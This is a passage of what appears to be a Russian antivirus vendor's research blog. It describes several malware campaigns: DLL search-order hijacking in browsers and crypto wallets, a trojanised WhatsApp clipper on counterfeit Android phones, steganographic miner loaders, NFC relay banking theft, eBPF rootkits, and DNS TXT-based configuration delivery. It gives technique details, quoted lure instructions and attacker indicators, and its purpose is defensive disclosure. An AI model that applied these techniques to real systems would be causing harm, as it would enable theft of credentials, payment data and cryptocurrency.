В 2024 году компания «Доктор Веб» расследовала инцидент информационной безопасности, связанный с попыткой проведения целевой атаки на одно из российских предприятий. Схема атаки включала применение вредоносного ПО, которое для заражения целевой системы эксплуатировало уязвимость к перехвату порядка поиска DLL (DLL Search Order Hijacking) в популярном веб-браузере. При запуске Windows-приложения производят поиск необходимых для работы библиотек в различных хранилищах и в определенной последовательности. Чтобы «обмануть» программы, злоумышленники размещают вредоносные DLL-файлы там, где поиск будет выполняться в первую очередь — например, в каталоге установки целевого ПО. При этом троянским файлам даются имена легитимных библиотек, которые располагаются в менее приоритетных для поиска директориях. В результате уязвимые программы при старте первыми загружают именно вредоносные DLL. Те работают как их составная часть и получают такие же права.

По следам рассмотренного инцидента наши специалисты внедрили в антивирусные продукты Dr.Web функциональность, которая позволяет отслеживать и предотвращать попытки эксплуатации уязвимостей к перехвату порядка поиска DLL. При изучении телеметрии данной функции вирусные аналитики «Доктор Веб» выявили попытки загрузки неизвестного ранее ВПО сразу в несколько браузеров наших клиентов. Изучение этих случаев и позволило обнаружить новую хакерскую кампанию, о которой пойдет речь в настоящем материале.

Заражение компьютеров вредоносными программами Trojan.Scavenger является многоступенчатым и начинается с троянов-загрузчиков, попадающих в целевые системы различными способами. Наши специалисты выявили две цепочки данной кампании с разным числом задействованных троянских компонентов.

Цепочка из трех загрузчиков

В этой цепочке заражения стартовым компонентом является вредоносная программа Trojan.Scavenger.1, представляющая собой динамическую библиотеку (DLL). Она может распространяться как в составе пиратских игр, так и под видом различных игровых патчей, читов и модов через торренты и посвященные игровой тематике сайты. Далее мы рассмотрим пример, где мошенники выдают трояна за патч.

Trojan.Scavenger.1 распространяется в ZIP-архиве вместе с инструкцией по установке. В ней злоумышленники побуждают потенциальную жертву поместить «патч» в каталог с игрой Oblivion Remastered — якобы для улучшения ее производительности:

Drag umpdc.dll and engine.ini to the game folder:
\steamapps\common\Oblivion Remastered\OblivionRemastered\Binaries\Win64
 
Engine.ini will automatically be loaded by the module.
The module will also apply some native patches to improve performance

Имя вредоносного файла выбрано атакующими не случайно: в ОС Windows легитимный файл с именем umpdc.dll располагается в системном каталоге %WINDIR%\System32. Он является частью графического API, которое используют различные программы, в том числе игры. Если в установленной у жертвы версии игры присутствует незакрытая уязвимость, копируемый троянский файл будет автоматически запускаться вместе ней. Стоит отметить, что актуальная на момент проведения исследования версия игры Oblivion Remastered корректно обрабатывала очередность поиска библиотеки umpdc.dll, поэтому в рассматриваемом примере Trojan.Scavenger.1 не мог автоматически запуститься с ней и продолжить цепочку заражения.

При успешном старте троян скачивает с удаленного сервера и запускает следующую стадию — загрузчика Trojan.Scavenger.2 (tmp6FC15.dll). Тот в свою очередь скачивает и устанавливает в систему другие модули семейства — Trojan.Scavenger.3 и Trojan.Scavenger.4.

Trojan.Scavenger.3 представляет собой динамическую библиотеку version.dll, которая копируется в каталог одного из целевых браузеров, построенных на базе движка Chromium. Она имеет такое же имя, как и одна из системных библиотек в директории %WINDIR%\System32. Уязвимые к перехвату порядка поиска DLL браузеры не проверяют, откуда загружается библиотека с таким именем. А поскольку троянский файл находится в их каталоге, он имеет приоритет над легитимной системной библиотекой и загружается первым. Наши вирусные аналитики зафиксировали попытки эксплуатации данной уязвимости в браузерах Google Chrome, Microsoft Edge, Яндекс Браузере и Opera.

После старта Trojan.Scavenger.3 отключает защитные механизмы целевого браузера — например, запуск его песочницы, — в результате чего в нем пропадает изоляция выполняемого JS-кода. Кроме того, троян отключает проверку расширений в браузере. Для этого он определяет соответствующую библиотеку Chromium по наличию в ней экспортируемой функции CrashForExceptionInNonABICompliantCodeRange. Затем он выполняет поиск процедуры проверки расширений в этой библиотеке и вносит соответствующий патч.

Далее троян модифицирует установленные в браузере целевые расширения, получая необходимые модификации в виде JavaScript-кода с C2-сервера. Изменениям подвергаются:

криптокошельки
- Phantom
- Slush
- MetaMask
менеджеры паролей
- Bitwarden
- LastPass

При этом модифицируются не оригиналы, а копии, которые троян предварительно помещает в каталог %TEMP%/ServiceWorkerCache. А чтобы браузер «подхватил» измененные расширения, Trojan.Scavenger.3 перехватывает управление функциями CreateFileW и GetFileAttributesExW, подменяя локальные пути к оригинальным файлам на пути к модификациям (Dr.Web детектирует их как Trojan.Scavenger.5).

Сами модификации представлены двумя вариантами:

добавляется временная метка к Cookie;
добавляется отправка пользовательских данных на C2-сервер.

Из криптокошельков Phantom, Slush и MetaMask злоумышленникам передаются приватные ключи и мнемонические фразы. От менеджера паролей Bitwarden им отправляется Cookie авторизации, а от LastPass — добавляемые жертвами пароли.

В свою очередь, Trojan.Scavenger.4 (profapi.dll) копируется в каталог с приложением криптокошелька Exodus. Троян запускается автоматически вместе с данной программой, также эксплуатируя в ней уязвимость DLL Search Order Hijacking (легитимная системная библиотека profapi.dll находится в директории %WINDIR%\System32, но из-за уязвимости приоритет загрузки при запуске кошелька отдается троянскому файлу).

После старта Trojan.Scavenger.4 перехватывает функцию v8::String::NewFromUtf8 из движка V8 для работы с JavaScript и WebAssambly. С ее помощью вредоносная программа отслеживает JSON, сформированные целевым приложением, и может получать различные пользовательские данные. В случае с программой Exodus троян ищет JSON, в котором присутствует ключ passphrase, после чего считывает его значение. В результате он получает пользовательскую мнемоническую фразу, которой можно расшифровать или сгенерировать приватный ключ от криптокошелька жертвы. Далее троян находит приватный ключ seed.seco от криптокошелька, считывает его и вместе с ранее полученной мнемонической фразой отправляет на C2-сервер.

Цепочка из двух загрузчиков

Данная цепочка в целом идентична первой, однако в распространяемых архивах с «патчами» и «читами» к играм вместо Trojan.Scavenger.1 находится модифицированная версия Trojan.Scavenger.2, представленная не в качестве DLL-файла, а в виде файла с расширением .ASI (фактически это динамическая библиотека с измененным расширением).

Архив также сопровождается инструкциями по установке:

Copy BOTH the Enhanced Nave Trainer folder and "Enhanced Native Trainer.asi" to the same folder as the scripthook and launch GTA.

После того как пользователь копирует файл в указанную директорию, тот будет автоматически запускаться при старте целевой игры, которая будет воспринимать его как свой плагин. С этого момента цепочка заражения повторяет шаги из первого варианта.

Особенности семейства

Большинство троянов семейства имеет ряд общих признаков. Одним из них является стандартная процедура проверки окружения на предмет работы в виртуальной среде или в режиме отладки. Если трояны обнаруживают признаки искусственной среды, они завершают работу.

Другой характерный признак семейства — единый алгоритм общения с управляющим сервером. Для связи с ним трояны проходят этап создания ключа и проверки шифрования. Он состоит из отправки двух запросов. Первый необходим для получения части ключа, который используется для шифрования некоторых параметров и данных в определенных запросах. Второй выполняется с целью проверки ключа и содержит определенные параметры, такие как случайным образом сгенерированная строка, текущее время и зашифрованное значение времени. На него C2-сервер отвечает полученной ранее строкой. Все последующие запросы содержат параметры времени, и при их отсутствии сервер отказывается выполнять соединение.

Подробные технические описания обнаруженных вредоносных программ находятся в PDF-версии исследования и в вирусной библиотеке компании «Доктор Веб».

Подробнее о Trojan.Scavenger.1

Подробнее о Trojan.Scavenger.2

Подробнее о Trojan.Scavenger.3

Подробнее о Trojan.Scavenger.4

Подробнее о Trojan.Scavenger.5

Заключение

Мы уведомили разработчиков, в чьем ПО эксплуатировались выявленные бреши в безопасности, однако они сочли уязвимости типа DLL Search Order Hijacking не требующими исправления. Но внедренная в антивирусные продукты Dr.Web защита от атак данного типа успешно противодействовала эксплуатации уязвимостей в затронутых браузерах еще до того, как мы узнали о семействе вредоносных программ Trojan.Scavenger, поэтому нашим пользователям эти трояны не угрожали. А в рамках проведенного исследования под эту защиту было также добавлено и приложение криптокошелька Exodus.

Индикаторы компрометации

Вот и поговорили: что связывает сомнительного качества Android-смартфоны, WhatsApp и кражу криптовалюты?

Mon, 14 Apr 2025 01:00:00 GMT

14 апреля 2025 года

С каждым годом криптовалюты становятся все более привычным методом оплаты. По данным на 2023 год в развитых странах примерно 20% населения когда-либо использовали такие средства платежа, а в развивающихся странах, где банковский сектор не отвечает потребностям населения, число пользователей криптовалют достигает еще больших значений. В рейтингах принятия криптовалют по количеству пользователей Россия находится в первой десятке стран. Анонимность и быстрота платежей, глобальный доступ и низкие комиссии за переводы являются основными преимуществами, которые привлекают рядовых пользователей. А для мошенников особый интерес представляют необратимость транзакций, отсутствие регуляции и недостаток знаний у пользователей ввиду относительной новизны криптовалютной технологии, что позволяет реализовывать самые разнообразные схемы незаконного обогащения.

С июня 2024 года в вирусную лабораторию «Доктор Веб» начали поступать сообщения от наших клиентов, которые установили антивирус Dr.Web Security Space на свежеприобретенные телефоны с ОС Android. При сканировании системного раздела прошивки было выявлено подозрительное приложение, замаскированное под мессенджер WhatsApp (принадлежит компании Meta, признанной экстремистской организацией и запрещенной в РФ). В ходе исследования, проведенного нашими аналитиками, было установлено, что эти случаи — не единичные: они свидетельствуют о мошеннической цепочке в рамках кампании по краже криптовалют методом клиппинга.

Клиппинг — это кража информации путем перехвата и/или подмены данных, которые пользователь копирует в буфер обмена. Наиболее часто клипперы нацелены на поиск в буфере обмена последовательностей символов, соответствующих адресам криптокошельков. В среднем такие строки содержат от 25 до 42 символов. Для удобства работы с такими данными пользователи обычно используют стандартные операции «копировать» и «вставить». Клиппер может воспользоваться этим, перехватив содержимое буфера обмена и незаметно подменив все адреса криптовалютных кошельков на те, которые принадлежат киберпреступникам.

Использование мессенджеров, троянизированных клипперами для кражи финансовой информации, не является новой тактикой для хакеров. Одна из подобных кампаний была выявлена еще в 2023 году. Тогда группа злоумышленников использовала ряд легитимных площадок, таких как Youtube, для распространения ссылок на вредоносные приложения Telegram и WhatsApp. Ссылки размещались в описаниях к видео. Основной целевой аудиторией были китайские пользователи, которые не имеют доступа к иностранным мессенджерам. А поскольку для обхода блокировок они используют ряд ухищрений, в частности скачивание программ с неофициальных сайтов, то такая кампания получила довольно внушительный размах.

Теперь злоумышленники смогли выйти на новый уровень и получить доступ к цепочке поставок ряда китайских производителей смартфонов на базе ОС Android. Именно про такие смартфоны и поступили сообщения в вирусную лабораторию «Доктор Веб». Мошеннические приложения были обнаружены непосредственно в составе предустановленного на телефоне ПО: вредоносный код был добавлен к мессенджеру WhatsApp.

Отметим, что в большинстве случаев скомпрометированные устройства были представлены в нижнем ценовом диапазоне и имели названия, созвучные с моделями известных брендов: S23 Ultra, Note 13 Pro, P70 Ultra и так далее. При этом их технические характеристики были далеки от заявленных. Дело в том, что в состав прошивки входило скрытое приложение, позволяющее с легкостью изменить всю отображаемую техническую информацию об устройстве не только в системном меню, но и в отчетах таких популярных приложений, как AIDA64 и CPU-Z. Кроме того, несмотря на то, что в разделе «Об устройстве» было заявлено об установленной последней версии Android 14, на самом деле все устройства работали под управлением одного и того же билда Android 12. Треть указанных ниже моделей выпускается под брендом SHOWJI. Производителей остальных моделей нам идентифицировать не удалось.

SHOWJI S19 Pro	Note 30i	Camon 20
SHOWJI Note 13 Pro	S23 Ultra	P70 Ultra
SHOWJI X100S Pro	S18 Pro	M14 Ultra
SHOWJI Reno12 Pro	6 Pro	S24 Ultra

Модели смартфонов со встроенным вредоносным ПО, приобретенные нашими пользователями

Изображения из карточек товаров

Скриншот программы для подделывания технических характеристик и результат ее работы

Более достоверные результаты при изучении технических характеристик предоставляет приложение DevCheck. В большинстве случаев оно точно определяет параметры устройства, даже если производитель пытается ввести потребителя в заблуждение.

Троянизированное приложение WhatsApp было создано с помощью инструмента LSPatch. Этот фреймворк позволяет изменять поведение основного приложения, не вмешиваясь в его код, а загружать для этого дополнительные программные модули. В данном случае мошенники разместили в папке assets вредоносный модуль com.whatsHook.apk, выполняющий следующие функции.

Перехват обновления приложения. Теперь вместо проверки обновлений по адресу hxxps://www.whatsapp[.]com/android/current/WhatsApp[.]apk происходит обращение к одному из серверов злоумышленников, например, hххps://apk-download[.]pro/download/whatsapp[.]apk. Это позволяет сохранять троянизированность приложения и вносить в его работу необходимые мошенникам изменения.

Метод, перехватывающий обращения к легитимному адресу обновлений

Класс, который передает поддельный адрес обновлений

Поиск строк в принимаемых и отправляемых сообщениях, соответствующих шаблонам адресов кошельков для криптовалют Tron (строка из 34 символов, начинается с T) и Ethereum (строка из 42 символов, начинается с 0x) и их подмена на адреса злоумышленников. Такая базовая функциональность клиппера была расширена, и теперь факт подмены адреса криптокошелька не виден жертве. В случае исходящего сообщения на скомпрометированном устройстве жертве демонстрируется корректный адрес ее собственного кошелька, а получателю сообщения отправляется адрес кошелька мошенников. При получении же входящего сообщения в чате собеседнику виден адрес отправленного им кошелька, а на устройстве жертвы входящий адрес подменяется на адрес кошелька хакеров. Адреса кошельков мошенников меняются при каждой итерации кампании, но в троян вшиты и резервные адреса ("TN7pfenJ1ePpjoPFaeu46pxjT9rhYDqW66", "0x673dB7Ed16A13Aa137d39401a085892D5e1f0fCA"), которые могут использоваться, если по каким-то причинам связь с С2-сервером не может быть установлена. Дополнительно троян отправляет на сервер злоумышленников все сообщения, отправляемые в мессенджере.

Парсер, выполняющий поиск адресов кошельков Tron

Парсер, выполняющий поиск адресов кошельков Ethereum

Поиск и отправка на сервер злоумышленников всех изображений в форматах jpg, png и jpeg в следующих папках:

DCIM	DOWNLOADS
PICTURES	DOCUMENTS
ALARMS	SCREENSHOTS

Это делается для поиска так называемых мнемонических фраз для криптокошельков, представляющих собой набор из 12–24 слов в определенной последовательности. Такая фраза демонстрируется однократно при создании кошелька и многие пользователи просто делают ее скриншот, а не записывают на отдельный носитель. Такие фразы позволяют восстановить доступ к кошельку, если пользователь забыл пароль. Для злоумышленников получение таких данных означает возможность сразу же вывести все деньги с криптокошелька.

Пример мнемонической фразы для восстановления доступа к криптокошельку. Слова необходимо вводить в соответствии с нумерацией

Отправляет информацию об устройстве: производитель, модель, языковые настройки и имя троянизированного приложения.

В вирусной базе Dr.Web этот троян получил отдельное название Shibai из-за строки Log.e("", "-------------------SHIBAI-释放------------"), содержащейся в его коде. Можно предположить, что это является отсылкой к названию одной из криптомонет.

Следует отметить, что данная кампания является очень масштабной. Аналогичным образом мошенники модифицировали порядка 40 приложений. Среди них — уже упомянутые нами WhatsApp и Telegram, а также другие мессенджеры, сканеры QR-кодов и т. д. Но в основном вмешательству подверглись популярные приложения криптокошельков (Mathwallet, Trust Wallet и другие). Всего было обнаружено более 60 С2-серверов, а для распространения вредоносных приложений задействованы порядка 30 доменов. Также нам удалось получить некоторые сведения о финансовых успехах троянописателей. На одном из отслеживаемых нами кошельков были замечены поступления за два года в размере более миллиона долларов. На другом нашлось ещё полмиллиона. Остальные кошельки (примерно 20 штук) хранили суммы до 100 тысяч долларов. Полную картину о доходности этой кампании получить невозможно, так как адреса кошельков получаются с сервера злоумышленников и каждый раз могут быть разными.

Один из наиболее доходных кошельков злоумышленников

Для защиты от подобных атак вирусные аналитики «Доктор Веб» рекомендуют установить антивирус Dr.Web Security Space для мобильных устройств, не приобретать смартфоны с характеристиками, явно несоответствующими своей цене, скачивать приложения только из доверенных источников, таких как Google Play, Rustore и AppGallery, а также не хранить скриншоты с мнемоническими фразами, паролями и ключами на устройстве в незашифрованном виде.

Подробнее о Tool.LSPatch.1

Подробнее о Android.Clipper.31

Индикаторы компрометации

Доктор, откуда у вас такие картинки? Использование стеганографии при добыче криптовалюты

Fri, 24 Jan 2025 17:17:16 GMT

24 января 2025 года

В ходе анализа данных телеметрии специалисты вирусной лаборатории «Доктор Веб» выявили образцы вредоносного ПО, которые при ближайшем рассмотрении оказались компонентами активной кампании по майнингу криптовалюты Monero. Эта кампания примечательна тем, что реализована в виде ряда вредоносных цепочек, две из которых построены на запуске скриптов, извлекающих вредоносную нагрузку из файлов изображений в формате BMP.

Начало кампании было положено, вероятно, в 2022 году, когда был обнаружен исполняемый файл Services.exe, являющийся .NET-приложением, запускающим сценарий VBscript. Этот сценарий реализует функции бэкдора, связываясь с сервером злоумышленников и выполняя скрипты и файлы, присланные в ответ. Так, на компьютер жертвы скачивался вредоносный файл ubr.txt, являвшийся скриптом для интерпретатора PowerShell, у которого было изменено расширение с ps1 на txt.

Скрипт ubr.txt проверяет наличие майнеров, которые могли быть уже установлены на скомпрометированной машине, и заменяет их на необходимые злоумышленникам версии. Устанавливаемые скриптом файлы представляют собой майнер SilentCryptoMiner и его настройки, с помощью которого хакеры добывали криптовалюту Monero.

Мы уже неоднократно писали об использовании этого майнера злоумышленниками, для которых привлекательна его простота конфигурации, расширенные возможности по добыче различных типов криптовалют и маскировке от диагностических утилит, а также поддержка удаленного управления всеми майнерами в ботнете посредством веб-панели.

В рамках этой кампании файлы майнера маскируются под различное ПО, в частности для проведения видеозвонков в Zoom (ZoomE.exe и ZoomX.exe) или службы Windows (Service32.exe и Service64.exe) и т. д. Несмотря на то, что существует несколько наборов вредоносных файлов, имеющих разные имена, все они выполняют одинаковые задачи — удаление других майнеров, установка нового майнера и доставка обновлений для него.

PowerShell-скрипт ubr.txt

Дополнительно майнер обращается к домену getcert[.]net, на котором расположен файл m.txt с настройками добычи криптовалюты. Этот ресурс также задействован и в других цепочках.

Файл m.txt, содержащий настройки майнера

В дальнейшем мошенники видоизменили методологию атаки, сделав её значительно более интересной и подключив средства стеганографии.

Стеганография — метод сокрытия одной информации внутри другой. В отличие от криптографии, когда зашифрованные данные могут привлечь внимание, стеганография позволяет незаметно скрыть информацию, например, в изображении. Многие эксперты по кибербезопасности полагают, что популярность использования стеганографии для обхода средств защиты будет набирать обороты.

Изображение слева (автор исходного фото: Marek Piwnicki) содержит в себе скрытое изображение с логотипом компании «Доктор Веб»

Вторая, более новая, цепочка реализована посредством трояна Amadey, который запускает PowerShell-скрипт Async.ps1, скачивающий изображения в формате BMP с легитимного хостинга изображений imghippo.com. С помощью стеганографических алгоритмов из изображений извлекаются два исполняемых файла: стилер Trojan.PackedNET.2429 и полезная нагрузка, которая:

отключает запрос UAC на повышение прав для администраторов,
вносит множество исключений во встроенный антивирус Windows Defender,
отключает уведомления в Windows,
создает новую задачу по пути \Microsoft\Windows\WindowsBackup\ с именем 'User'.

Содержимое скрипта Async1.ps

В ходе выполнения задачи происходит обращение к доменам злоумышленников, в записи DNS TXT которых содержится адрес хранения последующей полезной нагрузки. После ее скачивания происходит распаковка архива с изображениями в формате BMP и запуск следующих файлов:

Cleaner.txt — PowerShell-скрипт, удаляющий любые другие майнеры,
m.txt — PowerShell-скрипт, извлекающий полезную нагрузку из изображений m.bmp и IV.bmp. Нагрузка внутри изображений является майнером SilentCryptoMiner и запускающим его инжектором,
Net.txt — скрипт, который читает запись DNS TXT у доменов windowscdn[.]site и buyclients[.]xyz. В этой записи находится ссылка на полезную нагрузку, ведущая на сервис raw.githack[.]com.

Запись DNS TXT представляет собой расширение стандартной записи DNS и содержит текст, который в легитимных целях используется для верификации домена. Тем не менее, владелец домена может внести туда произвольные данные — например, как в данном случае, ссылку на полезную нагрузку.

Содержимое архива с вредоносными изображениями

Модули майнера постоянно развиваются. В последнее время авторы перешли к использованию легитимных ресурсов для размещения вредоносных изображений и платформу GitHub для хранения полезной нагрузки. Кроме того, были найдены модули, проверяющие факт запуска в песочницах и на виртуальных машинах.

Модуль, проверяющий имена запущенных приложений на соответствие названиям популярных инструментов, используемых исследователями кибербезопасности

Один из кошельков, указанный в настройках майнера, был создан в мае 2022 года, и к сегодняшнему дню на него было перечислено 340 XMR. Однако курс данной криптовалюты переживает период существенной волатильности, так что прибыль мошенников может составлять от 6 до 7,5 миллионов рублей. Судя по волнообразности хешрейта, что свидетельствует о регулярном включении и выключении компьютеров, в данной майнинговой кампании участвуют в основном рядовые пользователи, находящиеся в одной группе часовых поясов. В среднем хешрейт составляет 3,3 млн хешей в секунду, что позволяет скомпрометированным машинам приносить злоумышленникам по 1 XMR в 40 часов.

Эта кампания — лишь верхушка айсберга в мире киберугроз, построенных на средствах стеганографии, и она подчеркивает, насколько важно быть бдительными в цифровом пространстве. Рекомендации компании «Доктор Веб» остаются неизменными: устанавливайте программное обеспечение только из надёжных источников, не открывайте подозрительные ссылки и не отключайте антивирусную защиту при скачивании файлов из интернета.

Схема атаки

Индикаторы компрометации

Подробнее о SilentCryptoMiner

Подробнее о PowerShell.Starter.98

Подробнее о PowerShell.DownLoader.1640

Подробнее о Trojan.PackedNET.2429

Подробнее о VBS.DownLoader.2822

Бесконтактный банкинг за себя (и того парня): схема с кражей денег при помощи NFC добралась и до российских пользователей

Thu, 26 Dec 2024 00:00:00 GMT

26 декабря 2024 года

Вирусные аналитики «Доктор Веб» предупреждают о появлении новых версий банковского трояна NGate, нацеленных на российских пользователей. Этот троян передает данные с NFC-чипа скомпрометированного устройства, позволяя злоумышленнику снимать деньги со счетов жертвы в банкоматах без какого-либо участия с её стороны.

Банкер NGate впервые попал на радары антивирусных вендоров еще осенью 2023 года, когда в профильных СМИ стали появляться сообщения об атаках на клиентов крупных чешских банков. Стратегия злоумышленников строилась на комбинации социальной инженерии, фишинга и использования вредоносного ПО. Эти стандартные тактики воплотились в довольно новаторский сценарий: результатом взаимодействия с жертвой становился удаленный доступ к NFC-возможностям её платежного средства. Данная кампания была пресечена органами охраны правопорядка Чехии, однако её идея была адаптирована для российских реалий и реализована для незаконного обогащения за счет пользователей в России.

Событием, запускающее цепочку компрометации, предположительно является звонок от мошенников, которые сообщают о возможности получить различные социальные выплаты или иную финансовую выгоду. Для этого жертве необходимо проследовать по присланной ссылке на мошеннический сайт, откуда скачивается вредоносный APK с трояном NGate, замаскированный под приложение портала Госуслуг, Банка России, или одного из других популярных банков.

Иконки вредоносных приложений, стилизованные под официальные

Банковский троян NGate представляет собой вредоносную модификацию приложения с открытым исходным кодом NFCGate, которое было разработано для отладки протоколов передачи NFC-данных. NFCGate поддерживает ряд функций, однако для злоумышленников наибольший интерес представляют возможность захвата NFC-трафика приложений и передачи его на удаленное устройство, которым может выступать или сервер, или непосредственно смартфон злоумышленников. Преступники модифицировали исходный код, добавив к нему интерфейсы с айдентикой финансовых организаций, и включили режим ретрансляции NFC-данных. Кроме того, в состав приложения включена библиотека nfc-card-reader, которая позволяет хакерам удаленно получить также номер карты и срок ее действия.

После запуска приложения жертве, якобы для верификации себя в качестве клиента, предлагается приложить платежную карту к задней стороне смартфона, ввести свой PIN-код и подождать, пока псевдоприложение распознает карту. В это время происходит считывание данных с банковской карты и передача их преступникам. Обратим внимание на то, что для кражи NFC-данных атакуемый смартфон не требует root-доступа.

Экраны фейковых приложений

Пока жертва удерживает карту, приложенную к своему смартфону, злоумышленник уже будет находиться у банкомата и запрашивать выдачу наличных. Альтернативным вариантом является реализация данной схемы для бесконтактной оплаты покупок. И в момент, когда нужно будет приложить карту, мошенник просто предъявит свой телефон, который передаст цифровой отпечаток банковской карты жертвы. Подтвердить операцию он сможет полученным раннее PIN-кодом.

Во избежание кражи денег аналитики «Доктор Веб» рекомендуют соблюдать следующие правила:

не сообщать никому PIN- или CVV-коды своих банковских карт,
использовать антивирусное ПО, оно заблокирует скачивание и установку вредоносного ПО,
внимательно проверять адреса веб-страниц, где предлагается раскрывать любую финансовую информацию,
устанавливать приложения только из официальных источников, таких как RuStore, AppGalery и Google Play,
не вступать в разговоры с мошенниками. Если поступил неожиданный звонок от сотрудников органов правопорядка, банка, портала Госуслуг, Пенсионного фонда или любой другой организации, то следует повесить трубку. Затем можно найти контактный номер на официальном сайте ведомства и позвонить по нему самостоятельно.

Подробнее об Android.Banker.NGate.1

Индикаторы компрометации

Популяризация технологии eBPF и другие тренды в трояностроении

Tue, 10 Dec 2024 14:11:06 GMT

10 декабря 2024 года

Исследование очередного киберинцидента позволило вирусным аналитикам «Доктор Веб» выявить идущую хакерскую кампанию, в ходе которой проявились многие современные тенденции, применяемые злоумышленниками.

В компанию «Доктор Веб» обратился клиент, который заподозрил факт взлома своей компьютерной инфраструктуры. Выполняя анализ полученных данных, наши вирусные аналитики выявили ряд аналогичных случаев заражения, что позволило сделать вывод о проведении активной кампании. Усилия хакеров в основном сосредоточены на регионе Юго-Восточной Азии. В ходе атак они применяют целый комплекс вредоносного ПО, которое задействуется на разных этапах. К сожалению, нам не удалось однозначно определить то, как был получен изначальный доступ к скомпрометированным машинам. Однако мы смогли восстановить всю дальнейшую картину атаки. Наиболее примечательна эксплуатация злоумышленниками технологии eBPF (extended Berkeley Packet Filter).

Технология eBPF была разработана с целью расширения возможностей контроля над сетевой подсистемой ОС Linux и работой процессов. Она продемонстрировала довольно большой потенциал, что привлекло внимание крупных IT-компаний: практически с самого момента ее появления в фонд eBPF Foundation вошли такие гиганты как Google, Huawei, Intel и Netflix, принявшие участие в ее дальнейшей разработке. Однако еBPF заинтересовались и хакеры.

Предоставляя обширные низкоуровневые возможности, EBPF может использоваться злоумышленниками для сокрытия сетевой активности и процессов, сбора конфиденциальной информации, а также обхода сетевых экранов и систем обнаружения вторжений. Высокая сложность детектирования такого вредоносного ПО позволяет использовать его в рамках целевых АРТ-атак и в течение долгого времени маскировать активность хакеров.

Именно такими возможностями и решили воспользоваться злоумышленники, загрузив на скомпрометированную машину сразу два руткита. Первым устанавливался eBPF-руткит, который скрывал факт работы другого руткита, выполненного в виде модуля ядра, а тот, в свою очередь, подготавливал систему к установке трояна удаленного доступа. Особенностью трояна является поддержка ряда технологий туннелирования трафика, что позволяет ему связываться со злоумышленниками из приватных сегментов сети и маскировать передачу команд.

Использование вредоносного eBPF ПО набирает обороты с 2023 года. Об этом свидетельствует появление на свет нескольких семейств вредоносного ПО, основанных на данной технологии, среди которых можно отметить Boopkit, BPFDoor и Symbiote. А регулярное выявление уязвимостей лишь усугубляет ситуацию. Так, на сегодняшний день известны 217 уязвимостей BPF, причем около 100 из них датированы 2024 годом.

Следующей необычной особенностью кампании является довольно креативный подход к хранению настроек трояна. Если раньше для подобных нужд чаще всего использовались выделенные серверы, то теперь все чаще можно встретить случаи, когда конфигурация вредоносного ПО хранится в открытом доступе на публичных площадках. Так, исследуемое ПО обращалось к платформам Github и даже к страницам одного китайского блога. Такая особенность позволяет меньше привлекать внимание к трафику скомпрометированной машины — ведь та взаимодействует с безопасным узлом сети, — а также не заботиться о поддержании доступа к управляющему серверу с настройками. В целом идея использования публично-доступных сервисов в качестве управляющей инфраструктуры не нова, и ранее хакеры уже применяли для этой цели Dropbox, Google Drive, OneDrive и даже Discord. Однако региональные блокировки этих сервисов в ряде стран, в первую очередь в Китае, делают их менее привлекательными с точки зрения доступности. При этом доступ к Github сохраняется у большинства провайдеров, что делает его предпочтительным в глазах взломщиков.

Настройки, хранящиеся на Gitlab и в блоге, посвященном безопасности. Курьезно, что во втором случае взломщик просит помощи в расшифровке стороннего кода, который в дальнейшем будет отправляться трояну в качестве аргумента одной из команд

Ещё одной особенностью данной кампании стало применение трояна в составе фреймворка для постэксплуатации, то есть комплекса ПО, применяемого на дальнейших этапах атаки после получения доступа к компьютеру. Сами по себе такие фреймворки не являются чем-то запрещённым — их используют компании, официально предоставляющие услуги по аудиту безопасности. Наиболее популярными инструментами являются Cobalt Strike и Metasploit, которые позволяют автоматизировать большое количество проверок и имеют встроенную базу уязвимостей.

Пример карты сети, построенной Cobalt Strike (источник: сайт разработчика)

Конечно, такие возможности высоко ценятся и в среде хакеров. В 2022 году широкому кругу лиц стала доступна взломанная версия ПО Cobalt Strike, что обеспечило всплеск хакерской активности. Значительная часть инфраструктуры Cobalt Strike размещена в Китае. Отметим, что разработчик предпринимает усилия по отслеживанию установок фреймворка, а серверы со взломанными версиями регулярно блокируются органами правопорядка. Поэтому в настоящее время наблюдается устойчивый тренд перехода к использованию фреймворков с открытым исходным кодом, которые изначально поддерживают возможность расширения и видоизменения сетевой активности между зараженным устройством и сервером управления. Такая стратегия является предпочтительной, так как позволяет не привлекать дополнительное внимание к инфраструктуре взломщиков.

По результатам расследования все выявленные угрозы были добавлены в наши базы вредоносного ПО, дополнительно в алгоритмы эвристика были внесены признаки вредоносных eBPF-программ.

Подробнее об Trojan.Siggen28.58279

Индикаторы компрометации

Вредоносные приложения в Google Play: как злоумышленники используют DNS-протокол для скрытой связи троянов с управляющими серверами

Mon, 11 Nov 2024 14:27:07 GMT

11 ноября 2024 года

Задачей многих троянов Android.FakeApp является переход по ссылкам на различные сайты, и с технической точки зрения такие вредоносные программы довольно примитивны. При запуске они получают команду на открытие заданного веб-адреса, в результате чего установившие их пользователи вместо ожидаемой программы или игры видят на экранах своих устройств содержимое нежелательного сайта. Однако иногда среди таких подделок все же встречаются примечательные образцы — такие как Android.FakeApp.1669. От большинства подобных угроз он отличается использованием модифицированной библиотеки dnsjava, с помощью которой получает конфигурацию с вредоносного DNS-сервера, содержащую целевую ссылку. При этом такая конфигурация поступает ему только при подключении к интернету через определенных провайдеров — например, мобильного интернета. В иных же случаях троян никак себя не проявляет.

Android.FakeApp.1669 представлен большим числом модификаций, которые под видом тех или иных приложений распространяются в том числе через каталог Google Play. Так, известные в настоящий момент варианты трояна были загружены из официального электронного магазина ОС Android по меньшей мере 2 160 000 раз.

Примеры программ, в которых скрывался Android.FakeApp.1669

Ниже перечислены варианты Android.FakeApp.1669, которые вирусные аналитики «Доктор Веб» выявили в Google Play. Наши специалисты обнаружили больше троянских программ, но часть из них в этом магазине приложений уже отсутствует.

Название приложения	Число загрузок
Split it: Checks and Tips	1 000 000+
FlashPage parser	500 000+
BeYummy - your cookbook	100 000+
Memogen	100 000+
Display Moving Message	100 000+
WordCount	100 000+
Goal Achievement Planner	100 000+
DualText Compare	100 000+
Travel Memo	100 000+ (удалена)
DessertDreams Recipes	50 000+
Score Time	10 000+

При запуске Android.FakeApp.1669 выполняет DNS-запрос к управляющему серверу для получения TXT-записи, ассоциированной с именем целевого домена. В свою очередь, сервер отдает эту запись трояну, только если зараженное устройство подключено к Сети через целевых провайдеров, среди которых — провайдеры мобильного интернета. Такие TXT-записи обычно содержат сведения о домене и некоторую другую техническую информацию, однако в случае с Android.FakeApp.1669 в ней находится закодированная конфигурация для вредоносной программы.

Для отправки DNS-запросов Android.FakeApp.1669 использует модифицированный код Open Source-библиотеки dnsjava.

